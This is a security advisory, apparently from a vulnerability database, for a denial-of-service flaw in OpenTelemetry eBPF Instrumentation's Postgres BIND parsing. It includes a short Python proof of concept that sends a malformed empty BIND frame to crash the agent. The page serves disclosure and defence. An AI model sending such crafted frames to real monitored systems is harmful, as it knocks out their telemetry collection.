VYPR
High severity 7.5 · GHSA Advisory · Published May 18, 2026 · Updated May 18, 2026

OpenTelemetry eBPF Instrumentation: Postgres BIND parsing can panic on malformed payloads

CVE-2026-45678

Description

Summary

The Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic.

Details

The vulnerable logic is in pkg/ebpf/common/sql_detect_postgres.go. In the BIND case, OBI converts the full payload to a string with unix.ByteSliceToString(msg.data), computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to derive the statement name.

There is no check that msg.data actually contains a NUL terminator or even enough bytes for portalLen. With an empty payload or a truncated message, portalLen can exceed the slice length and trigger a runtime panic.

PoC

Local testing with a minimal reproducer showed the expected slice bounds out of range crash for an empty BIND payload.

Use a vulnerable build:

git checkout v0.0.0-rc.1+build
make build

Start a local Postgres instance and OBI:

docker run --rm -e POSTGRES_PASSWORD=postgres -p 5432:5432 postgres:17
sudo ./bin/obi

Send a malformed BIND frame with an empty payload:

# save as /tmp/pg-bind-poc.py
import socket, struct

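tag = b'B'                     # Bind message type byte
length = struct.pack(">I", 4)  # big-endian length that counts only the length field itself
payload = b""                  # no portal name and no NUL terminator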

s = socket.create_connection(("127.0.0.1", 5432))
s.sendall(tag + length + payload)
s.close()

Run it:

python3 /tmp/pg-bind-poc.py

On a vulnerable build, the Postgres parser in OBI panics while processing the captured payload.

Impact

This is a remote availability issue in OBI's Postgres parser. Any attacker able to send malformed Postgres traffic to a monitored service can crash the agent and stop telemetry collection for that node or process.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

A malformed BIND message without a valid portal name can cause the OBI Postgres protocol parser to panic, crashing the agent.

Vulnerability

The vulnerability resides in the OpenTelemetry eBPF Instrumentation (OBI) Postgres protocol parser, specifically in pkg/ebpf/common/sql_detect_postgres.go around line 286 [1][2][3]. In the BIND message case, the code uses unix.ByteSliceToString(msg.data) to convert the raw payload to a string, computes portalLen := len(portal) + 1, and then slices msg.data[portalLen:] to extract the statement name. No check ensures that msg.data actually contains a NUL terminator or that portalLen does not exceed the slice length. An empty payload or a truncated message can cause portalLen to exceed the buffer bounds and trigger a runtime panic. The affected version is v0.0.0-rc.1+build (and likely earlier builds as the project is in v0 development) [1][2][3].

Exploitation

An attacker needs only the ability to send network traffic to a PostgreSQL instance monitored by OBI. No authentication is required — the attacker can send a malformed Postgres protocol BIND frame from any network position that can reach the server. The PoC demonstrates sending a minimal BIND packet with an empty payload (tag B, length 4, zero-byte payload) [2][3]. When OBI's eBPF hook captures this traffic and the parser processes the payload, the missing length validation causes an out-of-bounds slice operation and the agent panics [2][3].

Impact

Successful exploitation results in a denial of service (availability impact). The OBI agent process crashes, stopping telemetry collection (metrics, spans, attributes) for the affected node or process [2][3]. No read or write access to host data is gained — the outcome is purely a crash of the monitoring agent.

Mitigation

As of the publication date (2026-05-18), no fixed version has been released. Users are advised to monitor the OBI repository for a patched release. Since OBI is in v0 development, breaking changes between minor releases are expected; users should pin to a specific semver tag and review upgrade notes [1]. No workaround is described in the available references. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities catalog as of this writing.

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Patches

No patches discovered yet.
